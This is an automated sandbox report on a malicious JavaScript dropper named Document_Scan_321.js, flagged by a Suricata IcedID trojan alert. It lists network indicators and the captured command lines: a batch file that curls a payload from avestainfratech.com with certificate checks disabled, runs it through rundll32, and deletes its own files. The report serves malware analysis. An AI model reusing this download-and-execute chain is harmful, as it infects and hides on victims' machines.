Summary | ZeroBOX

Document_Scan_321.js

UPX OS Processor Check PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 31, 2023, 9:49 a.m. Aug. 31, 2023, 9:51 a.m.
Size 33.0KB
Type ASCII text, with very long lines
MD5 e7c03a6bb595c52072921ba842e9f1ff
SHA256 e21ef7755a9edc8ff70096ef44491c953871498360191bc9128d9a2230da8ac9
CRC32 33A0D794
ssdeep 384:7vAwaHmh5oxN9uEovIen+G+bVq4TLIxiTjttgEIYtxa7QBcwWBIbX0KVq7rUQKao:kEyV55bEjghIYt/cQk6uo9C7G
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
172.67.179.217 Active Moloch
184.168.119.55 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49176 -> 172.67.179.217:80 2032086 ET MALWARE Win32/IcedID Request Cookie A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49169
184.168.119.55:443
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=avestainfratech.com df:8e:b4:c2:31:11:f0:2f:6a:95:27:bc:a4:2a:7e:67:b9:a3:6c:c7

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
suspicious_features GET method with no useragent header suspicious_request GET http://oopscokir.com/
request GET http://oopscokir.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\iusto.m.bat
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
cmdline cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
filepath: cmd.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
parent_process wscript.exe martian_process cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\rundll32.exe